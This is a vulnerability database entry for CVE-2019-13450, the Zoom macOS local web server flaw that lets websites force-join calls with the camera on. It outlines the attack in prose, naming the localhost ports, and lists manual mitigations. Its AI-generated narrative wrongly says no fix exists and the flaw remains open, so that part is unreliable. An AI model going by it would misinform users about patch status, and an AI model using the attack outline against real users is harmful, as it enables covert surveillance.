CVE-2019-13450
Description
Zoom Client for macOS installs a local web server that allows any website to force-enable the camera and join a video call without user permission.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Zoom Client for macOS installs a local web server that allows any website to force-enable the camera and join a video call without user permission.
Vulnerability
The Zoom Client for macOS through version 4.4.4 and RingCentral 7.0.136380.0312 installs a local web server that listens on ports 19421 or 19424 on localhost. Any arbitrary web page visited in a browser can communicate with this server, enabling it to issue commands such as initiating a video call with the camera activated. This occurs because the web server does not enforce origin restrictions or require any authentication. The vulnerability persists even after uninstallation if the ~/.zoomus directory remains.
Exploitation
An attacker needs only to host a malicious web page and entice a victim to visit it using a browser (such as Safari, Chrome, or Firefox) on the same machine where Zoom is installed. No authentication, prior interaction with the Zoom app, or special network access is required. The web page sends HTTP requests to http://localhost:19421 or http://localhost:19424 to invoke the Zoom URI handler or directly command the local server, forcing the client to join a video conference with the camera enabled [1][2].
Impact
Successful exploitation allows a remote attacker to turn on the victim's webcam and join a video call without the user's knowledge or consent. This is a severe privacy and surveillance risk, resulting in unauthorized video and potentially audio capture. The attacker gains no access to files or system code execution, but achieves a serious violation of the user's physical privacy. Since the camera activation occurs silently, the victim may remain unaware until after the fact.
Mitigation
Zoom declined to patch the vulnerability, stating it was not a security issue [1]. Users must manually disable the local web server. Mitigation steps include: setting the ZDisableVideo preference via defaults write zoom.us ZDisableVideo 1, killing the web server process, deleting the ~/.zoomus directory, and creating an empty ~/.zoomus plain file to prevent its recreation [1][2]. The vendor has not released a fixed version; the vulnerability remains open on all installations where these manual hardening steps are not applied.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
3- Zoom/Zoom Clientdescription
- Range: 7.0.136380.0312
- Range: <=4.4.4
Patches
0No patches discovered yet.
Vulnerability mechanics
No source-code context for this CVE — mechanics is only generated when we can read the actual fix diff. Without that, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.
References
8- www.securityfocus.com/bid/109082mitrevdb-entryx_refsource_BID
- assets.zoom.us/docs/pdf/Zoom+Response+Video-On+Vulnerability.pdfmitrex_refsource_MISC
- blog.zoom.us/wordpress/2019/07/08/response-to-video-on-concern/mitrex_refsource_MISC
- bugs.chromium.org/p/chromium/issues/detailmitrex_refsource_MISC
- medium.com/%40jonathan.leitschuh/zoom-zero-day-4-million-webcams-maybe-an-rce-just-get-them-to-visit-your-website-ac75c83f4ef5mitrex_refsource_MISC
- news.ycombinator.com/itemmitrex_refsource_MISC
- twitter.com/moreati/status/1148548799813640193mitrex_refsource_MISC
- twitter.com/zoom_us/status/1148710712241295361mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.